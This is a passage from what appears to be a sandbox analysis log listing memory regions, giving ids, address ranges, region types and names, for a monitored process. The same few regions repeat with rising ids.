start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3529 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3530 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3531 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3532 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3533 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3534 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3535 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3536 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3537 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3538 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3539 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3540 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3541 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3542 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3543 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3544 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3545 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3546 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3547 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3548 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3549 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3550 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3551 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3552 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3553 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3554 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3555 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3556 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3557 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3558 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3559 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3560 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3561 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3562 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3563 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3564 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3565 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3566 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3567 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3568 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3569 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3570 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3571 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3572 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3573 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3574 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3575 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3576 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3577 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3578 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3579 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3580 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3581 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3582 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3583 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3584 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3585 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3586 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3587 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3588 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3589 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3590 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3591 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3592 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3593 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3594 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3595 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3596 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3597 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3598 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3599 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3600 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3601 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3602 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3603 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3604 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3605 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3606 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3607 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3608 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3609 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3610 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3611 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3612 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3613 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3614 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3615 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3616 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3617 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3618 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3619 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3620 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3621 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3622 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3623 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3624 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3625 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3626 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3627 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3628 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3629 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3630 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3631 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3632 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3633 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3634 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3635 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3636 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3637 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3638 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3639 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3640 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3641 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3642 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3643 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3644 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3645 start_va = 0x510000 end_va = 0x52bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3646 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3647 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3648 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3649 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3650 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3651 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3652 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3653 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3654 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3655 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3656 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3657 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3658 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3659 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3660 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3661 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3662 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3663 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3664 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3665 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3666 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3667 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3668 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3669 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3670 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3671 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3672 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3673 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3674 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3675 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3676 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3677 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3678 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3679 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3680 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3681 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3682 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3683 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3684 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3685 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3686 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3687 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3688 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3689 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3690 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3691 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3692 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3693 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3694 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3695 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3696 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3697 start_va = 0x470000 end_va = 0x471fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 3698 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3699 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3700 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3701 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3702 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3703 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3704 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3705 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3706 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3707 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3708 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3709 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3710 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3711 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3712 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3713 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3714 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3715 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3716 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3717 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3718 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3719 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3720 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3721 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3722 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3723 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3724 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3725 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3726 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3727 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3728 start_va = 